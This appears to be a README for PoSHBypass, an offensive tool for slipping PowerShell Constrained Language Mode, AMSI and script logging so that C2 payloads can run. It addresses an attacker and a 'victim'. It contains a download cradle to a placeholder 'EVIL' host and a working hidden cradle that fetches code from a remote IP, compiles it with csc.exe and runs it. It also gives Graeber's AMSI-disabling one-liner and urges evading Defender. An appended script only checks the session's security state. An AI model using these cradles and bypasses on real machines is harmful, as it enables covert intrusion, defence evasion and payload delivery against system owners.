PoSH_Bypass

PoSHBypass is a payload and console proof of concept that allows an attacker, or for that matter a legitimate user, to bypass PowerShell's Constrained Language Mode, AMSI, and ScriptBlock and Module logging. The bulk of this concept is the combination of 3 separate pieces of research; I've stuck these 3 elements together as my first attempt at a non-'Hello World!' C# project.

PoSH_Bypass_Payload

To make use of this payload, all that is required is a newly generated Base64-encoded payload from PoshC2, Empire or whichever framework you choose (I've tested it with PoshC2 and Empire). Take the encoded section from the appropriate payload and paste it straight into the string Payload section of the code, then have Visual Studio compile the payload.

How you get this payload to your victim is up to you, but remember you are dealing with Constrained Language Mode, so a standard download cradle such as

```powershell
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
```

won't work: in Constrained Language Mode `New-Object` is limited to a small set of core .NET types, and `Net.WebClient` is not one of them, so the cradle fails before `IEX` ever runs. Something like this could help out though:

```powershell
$ua  = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-GB)'
$uri = 'http://192.168.32.143:8000/sourcecode.txt'
$tmp = "$env:userprofile\AppData\Local\Temp"

# Honour the user's WinINET proxy so the download works from behind a corporate proxy.
# ProxyServer is either 'host:port' or a per-protocol list such as
# 'http=host:port;https=host:port;ftp=host:port'; take the http entry (or the plain form).
$IESettings = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
if ($IESettings.ProxyEnable -eq 1 -and $IESettings.ProxyServer) {
    $entry   = $IESettings.ProxyServer.Split(';') | ? { $_ -match '^(http=|[^=]+$)' } | Select-Object -First 1
    $Proxy   = "http://$($entry -replace '^http=')"
    $request = Invoke-WebRequest -Uri $uri -UserAgent $ua -ProxyUseDefaultCredentials -Proxy $Proxy
} else {
    $request = Invoke-WebRequest -Uri $uri -UserAgent $ua
}

# Write the C# source to disk, compile it with the .NET Framework csc.exe, then run the result.
$request.Content | Out-File "$tmp\sourcecode.txt"
Start-Process -FilePath "$env:SystemRoot\Microsoft.NET\Framework\v4.0.30319\csc.exe" -ArgumentList "/unsafe /out:$tmp\Program.exe $tmp\sourcecode.txt" -WindowStyle Hidden -Wait
Start-Process -FilePath "$tmp\Program.exe" -WindowStyle Hidden
```

The above uses Invoke-WebRequest, which is a cmdlet and therefore still allowed under Constrained Language Mode, and is web-proxy aware: it downloads the C# source, compiles it with the .NET Framework's csc.exe and runs the resulting executable. The language mode only constrains what PowerShell itself evaluates; a separately compiled process is not subject to it. Be aware that powershell.exe spawning csc.exe to write an .exe into the user's Temp directory is a well-known pattern for defenders in its own right, so the cradle is not silent.

PoSh_Bypass

Just compile this code and it's ready to use: drop it on the box and run it, and a new PowerShell window will open up that you can use just as normal, without Constrained Language Mode or ScriptBlock logging. One thing I haven't sorted out is an automatic AMSI bypass (down to my lack of C# knowledge no doubt :)), so to counter AMSI the first command you should enter is the bypass given by Matt Graeber:

```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

There's a good chance this might actually get picked up by Defender, so you'll have to be creative to avoid the detection, but that's part of the fun.
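The following is an added example, not code from PoSH_Bypass or its author. It is a read-only check you can run inside the new console (before and after the AMSI one-liner, and equally in the original constrained session) to confirm what the session actually enforces: the language mode the cradle section has to work around, the ScriptBlock and Module logging policy, and whether AMSI is still scanning. The function name is my own; the registry paths are the standard policy locations, and the AMSI probe relies on Microsoft's documented AMSI test string being flagged by the installed provider (Defender does flag it).

```powershell
# Added example, not part of PoSH_Bypass: report what the current PowerShell session
# enforces. Nothing here modifies the session; Get-SessionSecurityState is a name of my own.
function Get-SessionSecurityState {
    # 1. Language mode. Anything other than FullLanguage means the session is restricted;
    #    ConstrainedLanguage is the mode the console is designed to get you out of.
    #    Cast rather than call .ToString(): method calls are restricted in CLM, property
    #    access and [string] conversion are not.
    $languageMode = [string]$ExecutionContext.SessionState.LanguageMode

    # 2. Script block and module logging as configured by policy. Both live under the same
    #    policy key; a missing value or 0 means not enabled by policy. PowerShell still writes
    #    event 4104 for blocks it considers suspicious even when the policy is off, so
    #    "disabled" is not the same as "nothing is logged".
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $sbl = (Get-ItemProperty -Path "$policyRoot\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    $mod = (Get-ItemProperty -Path "$policyRoot\ModuleLogging"      -ErrorAction SilentlyContinue).EnableModuleLogging

    # 3. Live AMSI probe using Microsoft's documented AMSI test string. A provider that
    #    honours it blocks any script block containing the full string. It is assembled at
    #    runtime from two halves so that this function definition is not itself flagged when
    #    parsed; only the content handed to Invoke-Expression contains the whole string.
    $probe = 'AMSI Test Sample: ' + '7e72c3ce-861b-4339-8740-0ac1484c1386'
    try {
        Invoke-Expression "`$null = '$probe'"
        $amsiScanning = $false   # ran untouched: nothing scanned this session's script blocks
    } catch {
        # Defender surfaces this as a ParseException: "This script contains malicious content..."
        $amsiScanning = $true
    }

    [pscustomobject]@{
        LanguageMode       = $languageMode
        ScriptBlockLogging = ($sbl -eq 1)
        ModuleLogging      = ($mod -eq 1)
        AmsiScanning       = $amsiScanning
    }
}

Get-SessionSecurityState
```

Run it once before the Graeber one-liner (expect `AmsiScanning = True` on a box with Defender) and once after (expect `False` if the bypass took). Note that the probe itself is a script block, so when ScriptBlockLogging is on it lands in the 4104 log like everything else you type; that is the point of checking before you do anything you would rather not have recorded.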